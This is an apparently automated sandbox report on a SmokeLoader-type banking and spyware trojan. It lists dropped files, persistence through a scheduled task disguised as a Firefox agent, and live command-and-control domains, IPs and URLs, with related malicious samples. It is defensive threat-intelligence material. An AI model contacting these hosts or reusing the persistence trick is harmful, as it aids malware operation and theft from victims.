                      172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe100%AviraTR/Crypt.XPACK.Gen
                      172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Temp\D700\C\Windows\SysWOW64\WalletBackgroundServiceProxy.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\D700\C\Windows\SysWOW64\WalletProxy.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\D700\C\Windows\SysWOW64\Windows.ApplicationModel.Wallet.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\D700\C\Windows\System32\WalletBackgroundServiceProxy.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\D700\C\Windows\System32\WalletProxy.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\D700\C\Windows\System32\Windows.ApplicationModel.Wallet.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\D700\C\Windows\WinSxS\amd64_microsoft-windows-w..-service.deployment_31bf3856ad364e35_10.0.19041.985_none_b6bad888bc038c2c\WalletService.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\D700\C\Windows\WinSxS\amd64_microsoft-windows-w..ice.backgroundproxy_31bf3856ad364e35_10.0.19041.1_none_fa16cd4ceba3021a\WalletBackgroundServiceProxy.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\D700\C\Windows\WinSxS\amd64_microsoft-windows-w..t-service.resources_31bf3856ad364e35_10.0.19041.1_en-us_0e357aa451e0d2d7\WalletService.dll.mui0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\D700\C\Windows\WinSxS\amd64_microsoft-windows-wallet-service.proxy_31bf3856ad364e35_10.0.19041.1_none_5f44912b33b38332\WalletProxy.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\D700\C\Windows\WinSxS\amd64_microsoft-windows-wallet-winrt_31bf3856ad364e35_10.0.19041.746_none_a953dd8b163491ed\Windows.ApplicationModel.Wallet.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\D700\C\Windows\WinSxS\wow64_microsoft-windows-w..ice.backgroundproxy_31bf3856ad364e35_10.0.19041.1_none_046b779f2003c415\WalletBackgroundServiceProxy.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\D700\C\Windows\WinSxS\wow64_microsoft-windows-wallet-service.proxy_31bf3856ad364e35_10.0.19041.1_none_69993b7d6814452d\WalletProxy.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\D700\C\Windows\WinSxS\wow64_microsoft-windows-wallet-winrt_31bf3856ad364e35_10.0.19041.746_none_b3a887dd4a9553e8\Windows.ApplicationModel.Wallet.dll0%ReversingLabs
                      C:\Users\user\AppData\Roaming\hfetwhc47%ReversingLabsWin32.Trojan.SmokeLoader

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                      https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV0%URL Reputationsafe
                      https://api.msn.com:443/v1/news/Feed/Windows?0%URL Reputationsafe
                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                      https://excel.office.com0%URL Reputationsafe
                      http://schemas.micro0%URL Reputationsafe
                      https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                      https://openjsf.org/0%URL Reputationsafe
                      http://jedwatson.github.io/classnames0%URL Reputationsafe
                      https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings0%URL Reputationsafe
                      https://lodash.com/0%URL Reputationsafe
                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                      https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
                      https://www.ecosia.org/newtab/0%URL Reputationsafe
                      https://outlook.com0%URL Reputationsafe
                      http://underscorejs.org/LICENSE0%URL Reputationsafe
                      https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                      https://android.notify.windows.com/iOS0%URL Reputationsafe
                      https://lodash.com/license0%URL Reputationsafe
                      https://api.msn.com/0%URL Reputationsafe
                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      innovixus.org
                      		198.54.117.242
                      		truetrue
                        		unknown
                        quantumqube.org
                        		194.87.189.87
                        		truetrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://quantumqube.org/index.phptrue
                            		unknown
                            https://quantumqube.org/index.phptrue
                              		unknown
                              http://innovixus.org/index.phptrue
                                		unknown
                                https://innovixus.org/index.phptrue
                                  		unknown

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://api.msn.com/v1/news/Feed/Windows?explorer.exe, 00000002.00000000.1475801434.00000000090DA000.00000004.00000001.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://duckduckgo.com/chrome_newtabexplorer.exe, 00000007.00000003.2362669537.0000000003309000.00000004.00000020.00020000.00000000.sdmp, C794.tmp.7.drfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://powerpoint.office.comerexplorer.exe, 00000002.00000000.1478526429.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://duckduckgo.com/ac/?q=explorer.exe, 00000007.00000003.2362669537.0000000003309000.00000004.00000020.00020000.00000000.sdmp, C794.tmp.7.drfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://android.notify.windows.com/iOSA4explorer.exe, 00000002.00000000.1478526429.000000000BC80000.00000004.00000001.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaTexplorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-worldexplorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1475801434.00000000091FB000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=explorer.exe, 00000007.00000003.2362669537.0000000003309000.00000004.00000020.00020000.00000000.sdmp, C794.tmp.7.drfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/viexplorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://excel.office.comexplorer.exe, 00000002.00000000.1478526429.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-1explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-bexplorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    http://schemas.microexplorer.exe, 00000002.00000000.1474886102.0000000007710000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1474899724.0000000007720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1473187872.0000000002C80000.00000002.00000001.00040000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svgexplorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      http://quantumqube.org/application/x-www-form-urlencodedMozilla/5.0explorer.exe, 00000007.00000002.2375965405.000000000330C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://wns.windows.com/EM0explorer.exe, 00000002.00000000.1478526429.000000000BDF5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://github.com/jsstyles/css-vendorexplorer.exe, 0000000D.00000003.2628764554.00000000052E6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2628291158.0000000005240000.00000004.00000020.00020000.00000000.sdmp, wallet-drawer.bundle.js.LICENSE.txt.13.drfalse
                                                            		unknown
                                                            https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINtexplorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchexplorer.exe, 00000007.00000003.2362669537.0000000003309000.00000004.00000020.00020000.00000000.sdmp, C794.tmp.7.drfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zealexplorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-itexplorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  http://quantumqube.org/ndex.phpexplorer.exe, 00000007.00000002.2375965405.00000000032C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    http://www.microsoft.cexplorer.exe, 00000002.00000000.1475801434.0000000009237000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://android.notify.windows.com/iOSdexplorer.exe, 00000002.00000000.1478526429.000000000BC80000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://openjsf.org/explorer.exe, 0000000D.00000003.2628764554.00000000052E6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2628291158.0000000005240000.00000004.00000020.00020000.00000000.sdmp, wallet-drawer.bundle.js.LICENSE.txt.13.drfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://jedwatson.github.io/classnamesexplorer.exe, 0000000D.00000003.2628764554.00000000052E6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2628291158.0000000005240000.00000004.00000020.00020000.00000000.sdmp, wallet-drawer.bundle.js.LICENSE.txt.13.drfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsiexplorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            http://quantumqube.org/index.php.explorer.exe, 0000000D.00000003.3028814712.000000000526C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2721237512.000000000526C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.3328845519.0000000005270000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-alexplorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  http://quantumqube.org/explorer.exe, 00000007.00000002.2375965405.0000000003298000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2375965405.0000000003304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2375965405.000000000330C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2375965405.00000000032E2000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                    		unknown
                                                                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9kexplorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icoexplorer.exe, 00000007.00000003.2362669537.0000000003309000.00000004.00000020.00020000.00000000.sdmp, C794.tmp.7.drfalse
                                                                                        		unknown
                                                                                        https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        https://lodash.com/explorer.exe, 0000000D.00000003.2628764554.00000000052E6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2628291158.0000000005240000.00000004.00000020.00020000.00000000.sdmp, wallet-drawer.bundle.js.LICENSE.txt.13.drfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-darkexplorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=explorer.exe, 00000007.00000003.2362669537.0000000003309000.00000004.00000020.00020000.00000000.sdmp, C794.tmp.7.drfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          https://www.ecosia.org/newtab/explorer.exe, 00000007.00000003.2362669537.0000000003309000.00000004.00000020.00020000.00000000.sdmp, C794.tmp.7.drfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          http://ns.adobeSexplorer.exe, 00000002.00000000.1473694819.0000000004405000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            https://outlook.comexplorer.exe, 00000002.00000000.1478526429.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA-darkexplorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              http://underscorejs.org/LICENSEexplorer.exe, 0000000D.00000003.2628764554.00000000052E6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2628291158.0000000005240000.00000004.00000020.00020000.00000000.sdmp, wallet-drawer.bundle.js.LICENSE.txt.13.drfalse
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              https://ac.ecosia.org/autocomplete?q=explorer.exe, 00000007.00000003.2362669537.0000000003309000.00000004.00000020.00020000.00000000.sdmp, C794.tmp.7.drfalse
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              http://quantumqube.org/index.phpMozilla/5.0explorer.exe, 00000007.00000002.2375965405.0000000003298000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2347347955.0000000000A79000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.3927428692.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3928236257.00000000010A9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3928453017.0000000003297000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3926853756.0000000000859000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.3928965249.00000000033D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                http://quantumqube.org:80/index.phpcrosoftexplorer.exe, 00000007.00000002.2375965405.00000000032E2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  https://api.msn.com/v1/news/Feed/Windows?activityId=0E948A694F8C48079B908C8EA9DDF9EA&timeOut=5000&ocexplorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    https://android.notify.windows.com/iOSexplorer.exe, 00000002.00000000.1478526429.000000000BC80000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    https://word.office.com48explorer.exe, 00000002.00000000.1478526429.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      		unknown
                                                                                                      https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexplorer.exe, 00000002.00000000.1478526429.000000000BC80000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        		unknown
                                                                                                        https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-theexplorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          		unknown
                                                                                                          https://lodash.com/licenseexplorer.exe, 0000000D.00000003.2628764554.00000000052E6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2628291158.0000000005240000.00000004.00000020.00020000.00000000.sdmp, wallet-drawer.bundle.js.LICENSE.txt.13.drfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svgexplorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            		unknown
                                                                                                            https://api.msn.com/explorer.exe, 00000002.00000000.1474139705.000000000702D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown
                                                                                                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBAexplorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              		unknown
                                                                                                              https://www.msn.com/en-us/sports/other/washington-state-ad-asks-ncaa-for-compassion-and-understandinexplorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                		unknown
                                                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=explorer.exe, 00000007.00000003.2362669537.0000000003309000.00000004.00000020.00020000.00000000.sdmp, C794.tmp.7.drfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-darkexplorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                https://www.msn.com:443/en-us/feedexplorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  		unknown
                                                                                                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-darkexplorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    		unknown
                                                                                                                    https://www.msn.com/en-us/weather/topstories/accuweather-el-niexplorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      		unknown
                                                                                                                      http://quantumqube.org/index.phpnexplorer.exe, 00000007.00000002.2375965405.0000000003298000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		unknown

                                                                                                                        World Map of Contacted IPs

                                                                                                                        • No. of IPs < 25%
                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                        • 75% < No. of IPs

                                                                                                                        Public IPs

                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                        194.87.189.87
                                                                                                                        		quantumqube.orgRussian Federation
                                                                                                                        		197695AS-REGRUtrue
                                                                                                                        198.54.117.242
                                                                                                                        		innovixus.orgUnited States
                                                                                                                        		22612NAMECHEAP-NETUStrue

                                                                                                                        General Information

                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                        Analysis ID:1527171
                                                                                                                        Start date and time:2024-10-06 21:25:10 +02:00
                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                        Overall analysis duration:0h 9m 49s
                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                        Report type:full
                                                                                                                        Cookbook file name:default.jbs
                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                        Number of analysed new started processes analysed:16
                                                                                                                        Number of new started drivers analysed:0
                                                                                                                        Number of existing processes analysed:0
                                                                                                                        Number of existing drivers analysed:0
                                                                                                                        Number of injected processes analysed:1
                                                                                                                        Technologies:
                                                                                                                        • HCA enabled
                                                                                                                        • EGA enabled
                                                                                                                        • AMSI enabled
                                                                                                                        Analysis Mode:default
                                                                                                                        Analysis stop reason:Timeout
                                                                                                                        Sample name:172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe
                                                                                                                        Detection:MAL
                                                                                                                        Classification:mal100.bank.troj.spyw.evad.winEXE@17/55@3/2
                                                                                                                        EGA Information:
                                                                                                                        • Successful, ratio: 100%
                                                                                                                        HCA Information:
                                                                                                                        • Successful, ratio: 96%
                                                                                                                        • Number of executed functions: 127
                                                                                                                        • Number of non-executed functions: 81
                                                                                                                        Cookbook Comments:
                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                        Warnings

                                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                        • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                        • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                        • Report size getting too big, too many NtOpenKey calls found.
                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                        • VT rate limit hit for: 172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe

                                                                                                                        Simulations

                                                                                                                        Behavior and APIs

                                                                                                                        TimeTypeDescription
                                                                                                                        15:26:24API Interceptor256399x Sleep call for process: explorer.exe modified
                                                                                                                        21:26:31Task SchedulerRun new task: Firefox Default Browser Agent 7B7BC59515542800 path: C:\Users\user\AppData\Roaming\hfetwhc

                                                                                                                        Joe Sandbox View / Context

                                                                                                                        IPs

                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                        198.54.117.242Kommerzielle Bestellung.pdf (2).exeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.golightresins.com/rn10/?DZZt=ochA0/+yD4T15LB3F5IXRtocyLTBiYmHj9IF8eWMKtE0E3XIuoy55xiykob9EQJmXVr3&vL08lV=dn3xFJ3xMHCx
                                                                                                                        LSW51096D32024I.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.tateshades.xyz/de94/?r49DK2LP=KxdOA0Mo1WZhrruLdWg4BGjiUazPRKkva+c6BVUkR9pg9lvbFJGOvuIlGoK6VQZT108t&CR-=Cr-TxJ
                                                                                                                        TNS71092E68UI0.vbeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.tateshades.xyz/de94/?iH=L48pdJnx&jBZ=KxdOA0Mo1WZhrruLdWg4BGjiUazPRKkva+c6BVUkR9pg9lvbFJGOvuIlGrqlewJrvTBn
                                                                                                                        Navana Pharmaceuticals PLC.pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.usebanq.com/azio/
                                                                                                                        hdBLUdo056.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.usebanq.com/8lx9/
                                                                                                                        fiY5fTkFKk.rtfGet hashmaliciousFormBookBrowse
                                                                                                                        • www.usebanq.com/8lx9/
                                                                                                                        tEBdYCAxQC.rtfGet hashmaliciousFormBookBrowse
                                                                                                                        • www.usebanq.com/8lx9/
                                                                                                                        PIG860624BF1GE1532.xml.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.cbsnews23.store/q696/
                                                                                                                        12nTpM7hB1.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                        • www.cbsnews23.store/q696/
                                                                                                                        OSL332C-HBLx#U180es#U180el#U180ex#U180e..exeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.cbsnews23.store/q696/

                                                                                                                        Domains

                                                                                                                        No context

                                                                                                                        ASNs

                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                        AS-REGRU-pdf.bat.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • 194.58.112.174
                                                                                                                        hH4dbIGfGT.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • 194.58.112.174
                                                                                                                        Fvqw64NU4k.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • 194.58.112.174
                                                                                                                        z4Shipping_document_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • 31.31.196.17
                                                                                                                        update SOA.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • 31.31.196.17
                                                                                                                        file.exeGet hashmaliciousLummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, PrivateLoader, Socks5SystemzBrowse
                                                                                                                        • 194.58.114.223
                                                                                                                        file.exeGet hashmaliciousLummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, Socks5SystemzBrowse
                                                                                                                        • 194.58.114.223
                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, StealcBrowse
                                                                                                                        • 37.140.192.213
                                                                                                                        RTGS-WB-ABS-240730-NEW.lnkGet hashmaliciousAgentTeslaBrowse
                                                                                                                        • 176.99.3.36
                                                                                                                        PO For Bulk Order.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • 31.31.196.17
                                                                                                                        NAMECHEAP-NETUShttp://nirothniroth.site/?p=22&fbclid=IwY2xjawFs_DdleHRuA2FlbQIxMQABHTdgZU6ok722L5RxKPR-zh7Gkm6BqZ8BcT950y1bxf6l0LKz0zslg7KJHw_aem__ldVm1UUndXAkwYRakjBzgGet hashmaliciousUnknownBrowse
                                                                                                                        • 63.250.43.7
                                                                                                                        http://reportrix.co.uk/assets/assetfile/js/main.jsGet hashmaliciousUnknownBrowse
                                                                                                                        • 104.219.248.24
                                                                                                                        presupuesto urgente.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                        • 199.192.19.19
                                                                                                                        1.cmdGet hashmaliciousUnknownBrowse
                                                                                                                        • 192.64.119.55
                                                                                                                        -pdf.bat.exeGet hashmaliciousFormBookBrowse
